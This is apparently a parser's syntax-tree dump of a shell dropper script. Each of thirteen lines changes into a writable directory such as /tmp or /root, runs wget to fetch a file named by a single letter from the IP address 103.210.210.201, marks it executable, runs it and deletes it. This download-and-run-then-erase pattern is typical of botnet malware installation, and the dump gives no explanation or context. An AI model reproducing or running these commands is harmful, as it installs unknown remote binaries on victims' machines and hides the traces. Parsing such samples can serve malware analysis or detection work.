ListNode(lineno=2, pos=(12, 123), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 96), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 96), word='http://103.210.210.201/a'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(96, 97)),
  CommandNode(lineno=2, pos=(98, 108), parts=[
    WordNode(lineno=2, pos=(98, 103), word='chmod'),
    WordNode(lineno=2, pos=(104, 106), word='+x'),
    WordNode(lineno=2, pos=(107, 108), word='a'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(108, 109)),
  CommandNode(lineno=2, pos=(110, 113), parts=[
    WordNode(lineno=2, pos=(110, 113), word='./a'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(113, 114)),
  CommandNode(lineno=2, pos=(115, 123), parts=[
    WordNode(lineno=2, pos=(115, 117), word='rm'),
    WordNode(lineno=2, pos=(118, 121), word='-rf'),
    WordNode(lineno=2, pos=(122, 123), word='a'),
  ]),
])
ListNode(lineno=3, pos=(124, 235), parts=[
  CommandNode(lineno=3, pos=(124, 131), parts=[
    WordNode(lineno=3, pos=(124, 126), word='cd'),
    WordNode(lineno=3, pos=(127, 131), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(132, 134)),
  CommandNode(lineno=3, pos=(135, 146), parts=[
    WordNode(lineno=3, pos=(135, 137), word='cd'),
    WordNode(lineno=3, pos=(138, 146), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(147, 149)),
  CommandNode(lineno=3, pos=(150, 157), parts=[
    WordNode(lineno=3, pos=(150, 152), word='cd'),
    WordNode(lineno=3, pos=(153, 157), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(158, 160)),
  CommandNode(lineno=3, pos=(161, 169), parts=[
    WordNode(lineno=3, pos=(161, 163), word='cd'),
    WordNode(lineno=3, pos=(164, 169), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(170, 172)),
  CommandNode(lineno=3, pos=(173, 177), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 177), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(177, 178)),
  CommandNode(lineno=3, pos=(179, 208), parts=[
    WordNode(lineno=3, pos=(179, 183), word='wget'),
    WordNode(lineno=3, pos=(184, 208), word='http://103.210.210.201/b'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(208, 209)),
  CommandNode(lineno=3, pos=(210, 220), parts=[
    WordNode(lineno=3, pos=(210, 215), word='chmod'),
    WordNode(lineno=3, pos=(216, 218), word='+x'),
    WordNode(lineno=3, pos=(219, 220), word='b'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(220, 221)),
  CommandNode(lineno=3, pos=(222, 225), parts=[
    WordNode(lineno=3, pos=(222, 225), word='./b'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(225, 226)),
  CommandNode(lineno=3, pos=(227, 235), parts=[
    WordNode(lineno=3, pos=(227, 229), word='rm'),
    WordNode(lineno=3, pos=(230, 233), word='-rf'),
    WordNode(lineno=3, pos=(234, 235), word='b'),
  ]),
])
ListNode(lineno=4, pos=(236, 347), parts=[
  CommandNode(lineno=4, pos=(236, 243), parts=[
    WordNode(lineno=4, pos=(236, 238), word='cd'),
    WordNode(lineno=4, pos=(239, 243), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(244, 246)),
  CommandNode(lineno=4, pos=(247, 258), parts=[
    WordNode(lineno=4, pos=(247, 249), word='cd'),
    WordNode(lineno=4, pos=(250, 258), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(259, 261)),
  CommandNode(lineno=4, pos=(262, 269), parts=[
    WordNode(lineno=4, pos=(262, 264), word='cd'),
    WordNode(lineno=4, pos=(265, 269), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(270, 272)),
  CommandNode(lineno=4, pos=(273, 281), parts=[
    WordNode(lineno=4, pos=(273, 275), word='cd'),
    WordNode(lineno=4, pos=(276, 281), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(282, 284)),
  CommandNode(lineno=4, pos=(285, 289), parts=[
    WordNode(lineno=4, pos=(285, 287), word='cd'),
    WordNode(lineno=4, pos=(288, 289), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(289, 290)),
  CommandNode(lineno=4, pos=(291, 320), parts=[
    WordNode(lineno=4, pos=(291, 295), word='wget'),
    WordNode(lineno=4, pos=(296, 320), word='http://103.210.210.201/c'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(320, 321)),
  CommandNode(lineno=4, pos=(322, 332), parts=[
    WordNode(lineno=4, pos=(322, 327), word='chmod'),
    WordNode(lineno=4, pos=(328, 330), word='+x'),
    WordNode(lineno=4, pos=(331, 332), word='c'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(332, 333)),
  CommandNode(lineno=4, pos=(334, 337), parts=[
    WordNode(lineno=4, pos=(334, 337), word='./c'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(337, 338)),
  CommandNode(lineno=4, pos=(339, 347), parts=[
    WordNode(lineno=4, pos=(339, 341), word='rm'),
    WordNode(lineno=4, pos=(342, 345), word='-rf'),
    WordNode(lineno=4, pos=(346, 347), word='c'),
  ]),
])
ListNode(lineno=5, pos=(348, 459), parts=[
  CommandNode(lineno=5, pos=(348, 355), parts=[
    WordNode(lineno=5, pos=(348, 350), word='cd'),
    WordNode(lineno=5, pos=(351, 355), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(356, 358)),
  CommandNode(lineno=5, pos=(359, 370), parts=[
    WordNode(lineno=5, pos=(359, 361), word='cd'),
    WordNode(lineno=5, pos=(362, 370), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(371, 373)),
  CommandNode(lineno=5, pos=(374, 381), parts=[
    WordNode(lineno=5, pos=(374, 376), word='cd'),
    WordNode(lineno=5, pos=(377, 381), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(382, 384)),
  CommandNode(lineno=5, pos=(385, 393), parts=[
    WordNode(lineno=5, pos=(385, 387), word='cd'),
    WordNode(lineno=5, pos=(388, 393), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(394, 396)),
  CommandNode(lineno=5, pos=(397, 401), parts=[
    WordNode(lineno=5, pos=(397, 399), word='cd'),
    WordNode(lineno=5, pos=(400, 401), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(401, 402)),
  CommandNode(lineno=5, pos=(403, 432), parts=[
    WordNode(lineno=5, pos=(403, 407), word='wget'),
    WordNode(lineno=5, pos=(408, 432), word='http://103.210.210.201/d'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(432, 433)),
  CommandNode(lineno=5, pos=(434, 444), parts=[
    WordNode(lineno=5, pos=(434, 439), word='chmod'),
    WordNode(lineno=5, pos=(440, 442), word='+x'),
    WordNode(lineno=5, pos=(443, 444), word='d'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(444, 445)),
  CommandNode(lineno=5, pos=(446, 449), parts=[
    WordNode(lineno=5, pos=(446, 449), word='./d'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(449, 450)),
  CommandNode(lineno=5, pos=(451, 459), parts=[
    WordNode(lineno=5, pos=(451, 453), word='rm'),
    WordNode(lineno=5, pos=(454, 457), word='-rf'),
    WordNode(lineno=5, pos=(458, 459), word='d'),
  ]),
])
ListNode(lineno=6, pos=(460, 571), parts=[
  CommandNode(lineno=6, pos=(460, 467), parts=[
    WordNode(lineno=6, pos=(460, 462), word='cd'),
    WordNode(lineno=6, pos=(463, 467), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(468, 470)),
  CommandNode(lineno=6, pos=(471, 482), parts=[
    WordNode(lineno=6, pos=(471, 473), word='cd'),
    WordNode(lineno=6, pos=(474, 482), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(483, 485)),
  CommandNode(lineno=6, pos=(486, 493), parts=[
    WordNode(lineno=6, pos=(486, 488), word='cd'),
    WordNode(lineno=6, pos=(489, 493), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(494, 496)),
  CommandNode(lineno=6, pos=(497, 505), parts=[
    WordNode(lineno=6, pos=(497, 499), word='cd'),
    WordNode(lineno=6, pos=(500, 505), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(506, 508)),
  CommandNode(lineno=6, pos=(509, 513), parts=[
    WordNode(lineno=6, pos=(509, 511), word='cd'),
    WordNode(lineno=6, pos=(512, 513), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(513, 514)),
  CommandNode(lineno=6, pos=(515, 544), parts=[
    WordNode(lineno=6, pos=(515, 519), word='wget'),
    WordNode(lineno=6, pos=(520, 544), word='http://103.210.210.201/e'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(544, 545)),
  CommandNode(lineno=6, pos=(546, 556), parts=[
    WordNode(lineno=6, pos=(546, 551), word='chmod'),
    WordNode(lineno=6, pos=(552, 554), word='+x'),
    WordNode(lineno=6, pos=(555, 556), word='e'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(556, 557)),
  CommandNode(lineno=6, pos=(558, 561), parts=[
    WordNode(lineno=6, pos=(558, 561), word='./e'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(561, 562)),
  CommandNode(lineno=6, pos=(563, 571), parts=[
    WordNode(lineno=6, pos=(563, 565), word='rm'),
    WordNode(lineno=6, pos=(566, 569), word='-rf'),
    WordNode(lineno=6, pos=(570, 571), word='e'),
  ]),
])
ListNode(lineno=7, pos=(572, 683), parts=[
  CommandNode(lineno=7, pos=(572, 579), parts=[
    WordNode(lineno=7, pos=(572, 574), word='cd'),
    WordNode(lineno=7, pos=(575, 579), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(580, 582)),
  CommandNode(lineno=7, pos=(583, 594), parts=[
    WordNode(lineno=7, pos=(583, 585), word='cd'),
    WordNode(lineno=7, pos=(586, 594), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(595, 597)),
  CommandNode(lineno=7, pos=(598, 605), parts=[
    WordNode(lineno=7, pos=(598, 600), word='cd'),
    WordNode(lineno=7, pos=(601, 605), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(606, 608)),
  CommandNode(lineno=7, pos=(609, 617), parts=[
    WordNode(lineno=7, pos=(609, 611), word='cd'),
    WordNode(lineno=7, pos=(612, 617), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(618, 620)),
  CommandNode(lineno=7, pos=(621, 625), parts=[
    WordNode(lineno=7, pos=(621, 623), word='cd'),
    WordNode(lineno=7, pos=(624, 625), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(625, 626)),
  CommandNode(lineno=7, pos=(627, 656), parts=[
    WordNode(lineno=7, pos=(627, 631), word='wget'),
    WordNode(lineno=7, pos=(632, 656), word='http://103.210.210.201/f'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(656, 657)),
  CommandNode(lineno=7, pos=(658, 668), parts=[
    WordNode(lineno=7, pos=(658, 663), word='chmod'),
    WordNode(lineno=7, pos=(664, 666), word='+x'),
    WordNode(lineno=7, pos=(667, 668), word='f'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(668, 669)),
  CommandNode(lineno=7, pos=(670, 673), parts=[
    WordNode(lineno=7, pos=(670, 673), word='./f'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(673, 674)),
  CommandNode(lineno=7, pos=(675, 683), parts=[
    WordNode(lineno=7, pos=(675, 677), word='rm'),
    WordNode(lineno=7, pos=(678, 681), word='-rf'),
    WordNode(lineno=7, pos=(682, 683), word='f'),
  ]),
])
ListNode(lineno=8, pos=(684, 795), parts=[
  CommandNode(lineno=8, pos=(684, 691), parts=[
    WordNode(lineno=8, pos=(684, 686), word='cd'),
    WordNode(lineno=8, pos=(687, 691), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(692, 694)),
  CommandNode(lineno=8, pos=(695, 706), parts=[
    WordNode(lineno=8, pos=(695, 697), word='cd'),
    WordNode(lineno=8, pos=(698, 706), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(707, 709)),
  CommandNode(lineno=8, pos=(710, 717), parts=[
    WordNode(lineno=8, pos=(710, 712), word='cd'),
    WordNode(lineno=8, pos=(713, 717), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(718, 720)),
  CommandNode(lineno=8, pos=(721, 729), parts=[
    WordNode(lineno=8, pos=(721, 723), word='cd'),
    WordNode(lineno=8, pos=(724, 729), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(730, 732)),
  CommandNode(lineno=8, pos=(733, 737), parts=[
    WordNode(lineno=8, pos=(733, 735), word='cd'),
    WordNode(lineno=8, pos=(736, 737), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(737, 738)),
  CommandNode(lineno=8, pos=(739, 768), parts=[
    WordNode(lineno=8, pos=(739, 743), word='wget'),
    WordNode(lineno=8, pos=(744, 768), word='http://103.210.210.201/g'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(768, 769)),
  CommandNode(lineno=8, pos=(770, 780), parts=[
    WordNode(lineno=8, pos=(770, 775), word='chmod'),
    WordNode(lineno=8, pos=(776, 778), word='+x'),
    WordNode(lineno=8, pos=(779, 780), word='g'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(780, 781)),
  CommandNode(lineno=8, pos=(782, 785), parts=[
    WordNode(lineno=8, pos=(782, 785), word='./g'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(785, 786)),
  CommandNode(lineno=8, pos=(787, 795), parts=[
    WordNode(lineno=8, pos=(787, 789), word='rm'),
    WordNode(lineno=8, pos=(790, 793), word='-rf'),
    WordNode(lineno=8, pos=(794, 795), word='g'),
  ]),
])
ListNode(lineno=9, pos=(796, 907), parts=[
  CommandNode(lineno=9, pos=(796, 803), parts=[
    WordNode(lineno=9, pos=(796, 798), word='cd'),
    WordNode(lineno=9, pos=(799, 803), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(804, 806)),
  CommandNode(lineno=9, pos=(807, 818), parts=[
    WordNode(lineno=9, pos=(807, 809), word='cd'),
    WordNode(lineno=9, pos=(810, 818), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(819, 821)),
  CommandNode(lineno=9, pos=(822, 829), parts=[
    WordNode(lineno=9, pos=(822, 824), word='cd'),
    WordNode(lineno=9, pos=(825, 829), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(830, 832)),
  CommandNode(lineno=9, pos=(833, 841), parts=[
    WordNode(lineno=9, pos=(833, 835), word='cd'),
    WordNode(lineno=9, pos=(836, 841), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(842, 844)),
  CommandNode(lineno=9, pos=(845, 849), parts=[
    WordNode(lineno=9, pos=(845, 847), word='cd'),
    WordNode(lineno=9, pos=(848, 849), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(849, 850)),
  CommandNode(lineno=9, pos=(851, 880), parts=[
    WordNode(lineno=9, pos=(851, 855), word='wget'),
    WordNode(lineno=9, pos=(856, 880), word='http://103.210.210.201/h'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(880, 881)),
  CommandNode(lineno=9, pos=(882, 892), parts=[
    WordNode(lineno=9, pos=(882, 887), word='chmod'),
    WordNode(lineno=9, pos=(888, 890), word='+x'),
    WordNode(lineno=9, pos=(891, 892), word='h'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(892, 893)),
  CommandNode(lineno=9, pos=(894, 897), parts=[
    WordNode(lineno=9, pos=(894, 897), word='./h'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(897, 898)),
  CommandNode(lineno=9, pos=(899, 907), parts=[
    WordNode(lineno=9, pos=(899, 901), word='rm'),
    WordNode(lineno=9, pos=(902, 905), word='-rf'),
    WordNode(lineno=9, pos=(906, 907), word='h'),
  ]),
])
ListNode(lineno=10, pos=(908, 1019), parts=[
  CommandNode(lineno=10, pos=(908, 915), parts=[
    WordNode(lineno=10, pos=(908, 910), word='cd'),
    WordNode(lineno=10, pos=(911, 915), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(916, 918)),
  CommandNode(lineno=10, pos=(919, 930), parts=[
    WordNode(lineno=10, pos=(919, 921), word='cd'),
    WordNode(lineno=10, pos=(922, 930), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(931, 933)),
  CommandNode(lineno=10, pos=(934, 941), parts=[
    WordNode(lineno=10, pos=(934, 936), word='cd'),
    WordNode(lineno=10, pos=(937, 941), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(942, 944)),
  CommandNode(lineno=10, pos=(945, 953), parts=[
    WordNode(lineno=10, pos=(945, 947), word='cd'),
    WordNode(lineno=10, pos=(948, 953), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(954, 956)),
  CommandNode(lineno=10, pos=(957, 961), parts=[
    WordNode(lineno=10, pos=(957, 959), word='cd'),
    WordNode(lineno=10, pos=(960, 961), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(961, 962)),
  CommandNode(lineno=10, pos=(963, 992), parts=[
    WordNode(lineno=10, pos=(963, 967), word='wget'),
    WordNode(lineno=10, pos=(968, 992), word='http://103.210.210.201/i'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(992, 993)),
  CommandNode(lineno=10, pos=(994, 1004), parts=[
    WordNode(lineno=10, pos=(994, 999), word='chmod'),
    WordNode(lineno=10, pos=(1000, 1002), word='+x'),
    WordNode(lineno=10, pos=(1003, 1004), word='i'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1004, 1005)),
  CommandNode(lineno=10, pos=(1006, 1009), parts=[
    WordNode(lineno=10, pos=(1006, 1009), word='./i'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1009, 1010)),
  CommandNode(lineno=10, pos=(1011, 1019), parts=[
    WordNode(lineno=10, pos=(1011, 1013), word='rm'),
    WordNode(lineno=10, pos=(1014, 1017), word='-rf'),
    WordNode(lineno=10, pos=(1018, 1019), word='i'),
  ]),
])
ListNode(lineno=11, pos=(1020, 1131), parts=[
  CommandNode(lineno=11, pos=(1020, 1027), parts=[
    WordNode(lineno=11, pos=(1020, 1022), word='cd'),
    WordNode(lineno=11, pos=(1023, 1027), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1028, 1030)),
  CommandNode(lineno=11, pos=(1031, 1042), parts=[
    WordNode(lineno=11, pos=(1031, 1033), word='cd'),
    WordNode(lineno=11, pos=(1034, 1042), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1043, 1045)),
  CommandNode(lineno=11, pos=(1046, 1053), parts=[
    WordNode(lineno=11, pos=(1046, 1048), word='cd'),
    WordNode(lineno=11, pos=(1049, 1053), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1054, 1056)),
  CommandNode(lineno=11, pos=(1057, 1065), parts=[
    WordNode(lineno=11, pos=(1057, 1059), word='cd'),
    WordNode(lineno=11, pos=(1060, 1065), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1066, 1068)),
  CommandNode(lineno=11, pos=(1069, 1073), parts=[
    WordNode(lineno=11, pos=(1069, 1071), word='cd'),
    WordNode(lineno=11, pos=(1072, 1073), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1073, 1074)),
  CommandNode(lineno=11, pos=(1075, 1104), parts=[
    WordNode(lineno=11, pos=(1075, 1079), word='wget'),
    WordNode(lineno=11, pos=(1080, 1104), word='http://103.210.210.201/j'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1104, 1105)),
  CommandNode(lineno=11, pos=(1106, 1116), parts=[
    WordNode(lineno=11, pos=(1106, 1111), word='chmod'),
    WordNode(lineno=11, pos=(1112, 1114), word='+x'),
    WordNode(lineno=11, pos=(1115, 1116), word='j'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1116, 1117)),
  CommandNode(lineno=11, pos=(1118, 1121), parts=[
    WordNode(lineno=11, pos=(1118, 1121), word='./j'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1121, 1122)),
  CommandNode(lineno=11, pos=(1123, 1131), parts=[
    WordNode(lineno=11, pos=(1123, 1125), word='rm'),
    WordNode(lineno=11, pos=(1126, 1129), word='-rf'),
    WordNode(lineno=11, pos=(1130, 1131), word='j'),
  ]),
])
ListNode(lineno=12, pos=(1132, 1243), parts=[
  CommandNode(lineno=12, pos=(1132, 1139), parts=[
    WordNode(lineno=12, pos=(1132, 1134), word='cd'),
    WordNode(lineno=12, pos=(1135, 1139), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1140, 1142)),
  CommandNode(lineno=12, pos=(1143, 1154), parts=[
    WordNode(lineno=12, pos=(1143, 1145), word='cd'),
    WordNode(lineno=12, pos=(1146, 1154), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1155, 1157)),
  CommandNode(lineno=12, pos=(1158, 1165), parts=[
    WordNode(lineno=12, pos=(1158, 1160), word='cd'),
    WordNode(lineno=12, pos=(1161, 1165), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1166, 1168)),
  CommandNode(lineno=12, pos=(1169, 1177), parts=[
    WordNode(lineno=12, pos=(1169, 1171), word='cd'),
    WordNode(lineno=12, pos=(1172, 1177), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1178, 1180)),
  CommandNode(lineno=12, pos=(1181, 1185), parts=[
    WordNode(lineno=12, pos=(1181, 1183), word='cd'),
    WordNode(lineno=12, pos=(1184, 1185), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1185, 1186)),
  CommandNode(lineno=12, pos=(1187, 1216), parts=[
    WordNode(lineno=12, pos=(1187, 1191), word='wget'),
    WordNode(lineno=12, pos=(1192, 1216), word='http://103.210.210.201/k'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1216, 1217)),
  CommandNode(lineno=12, pos=(1218, 1228), parts=[
    WordNode(lineno=12, pos=(1218, 1223), word='chmod'),
    WordNode(lineno=12, pos=(1224, 1226), word='+x'),
    WordNode(lineno=12, pos=(1227, 1228), word='k'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1228, 1229)),
  CommandNode(lineno=12, pos=(1230, 1233), parts=[
    WordNode(lineno=12, pos=(1230, 1233), word='./k'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1233, 1234)),
  CommandNode(lineno=12, pos=(1235, 1243), parts=[
    WordNode(lineno=12, pos=(1235, 1237), word='rm'),
    WordNode(lineno=12, pos=(1238, 1241), word='-rf'),
    WordNode(lineno=12, pos=(1242, 1243), word='k'),
  ]),
])
ListNode(lineno=13, pos=(1244, 1355), parts=[
  CommandNode(lineno=13, pos=(1244, 1251), parts=[
    WordNode(lineno=13, pos=(1244, 1246), word='cd'),
    WordNode(lineno=13, pos=(1247, 1251), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1252, 1254)),
  CommandNode(lineno=13, pos=(1255, 1266), parts=[
    WordNode(lineno=13, pos=(1255, 1257), word='cd'),
    WordNode(lineno=13, pos=(1258, 1266), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1267, 1269)),
  CommandNode(lineno=13, pos=(1270, 1277), parts=[
    WordNode(lineno=13, pos=(1270, 1272), word='cd'),
    WordNode(lineno=13, pos=(1273, 1277), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1278, 1280)),
  CommandNode(lineno=13, pos=(1281, 1289), parts=[
    WordNode(lineno=13, pos=(1281, 1283), word='cd'),
    WordNode(lineno=13, pos=(1284, 1289), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1290, 1292)),
  CommandNode(lineno=13, pos=(1293, 1297), parts=[
    WordNode(lineno=13, pos=(1293, 1295), word='cd'),
    WordNode(lineno=13, pos=(1296, 1297), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1297, 1298)),
  CommandNode(lineno=13, pos=(1299, 1328), parts=[
    WordNode(lineno=13, pos=(1299, 1303), word='wget'),
    WordNode(lineno=13, pos=(1304, 1328), word='http://103.210.210.201/l'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1328, 1329)),
  CommandNode(lineno=13, pos=(1330, 1340), parts=[
    WordNode(lineno=13, pos=(1330, 1335), word='chmod'),
    WordNode(lineno=13, pos=(1336, 1338), word='+x'),
    WordNode(lineno=13, pos=(1339, 1340), word='l'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1340, 1341)),
  CommandNode(lineno=13, pos=(1342, 1345), parts=[
    WordNode(lineno=13, pos=(1342, 1345), word='./l'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1345, 1346)),
  CommandNode(lineno=13, pos=(1347, 1355), parts=[
    WordNode(lineno=13, pos=(1347, 1349), word='rm'),
    WordNode(lineno=13, pos=(1350, 1353), word='-rf'),
    WordNode(lineno=13, pos=(1354, 1355), word='l'),
  ]),
])
ListNode(lineno=14, pos=(1356, 1467), parts=[
  CommandNode(lineno=14, pos=(1356, 1363), parts=[
    WordNode(lineno=14, pos=(1356, 1358), word='cd'),
    WordNode(lineno=14, pos=(1359, 1363), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1364, 1366)),
  CommandNode(lineno=14, pos=(1367, 1378), parts=[
    WordNode(lineno=14, pos=(1367, 1369), word='cd'),
    WordNode(lineno=14, pos=(1370, 1378), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1379, 1381)),
  CommandNode(lineno=14, pos=(1382, 1389), parts=[
    WordNode(lineno=14, pos=(1382, 1384), word='cd'),
    WordNode(lineno=14, pos=(1385, 1389), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1390, 1392)),
  CommandNode(lineno=14, pos=(1393, 1401), parts=[
    WordNode(lineno=14, pos=(1393, 1395), word='cd'),
    WordNode(lineno=14, pos=(1396, 1401), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1402, 1404)),
  CommandNode(lineno=14, pos=(1405, 1409), parts=[
    WordNode(lineno=14, pos=(1405, 1407), word='cd'),
    WordNode(lineno=14, pos=(1408, 1409), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1409, 1410)),
  CommandNode(lineno=14, pos=(1411, 1440), parts=[
    WordNode(lineno=14, pos=(1411, 1415), word='wget'),
    WordNode(lineno=14, pos=(1416, 1440), word='http://103.210.210.201/m'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1440, 1441)),
  CommandNode(lineno=14, pos=(1442, 1452), parts=[
    WordNode(lineno=14, pos=(1442, 1447), word='chmod'),
    WordNode(lineno=14, pos=(1448, 1450), word='+x'),
    WordNode(lineno=14, pos=(1451, 1452), word='m'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1452, 1453)),
  CommandNode(lineno=14, pos=(1454, 1457), parts=[
    WordNode(lineno=14, pos=(1454, 1457), word='./m'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1457, 1458)),
  CommandNode(lineno=14, pos=(1459, 1467), parts=[
    WordNode(lineno=14, pos=(1459, 1461), word='rm'),
    WordNode(lineno=14, pos=(1462, 1465), word='-rf'),
    WordNode(lineno=14, pos=(1466, 1467), word='m'),
  ]),
])
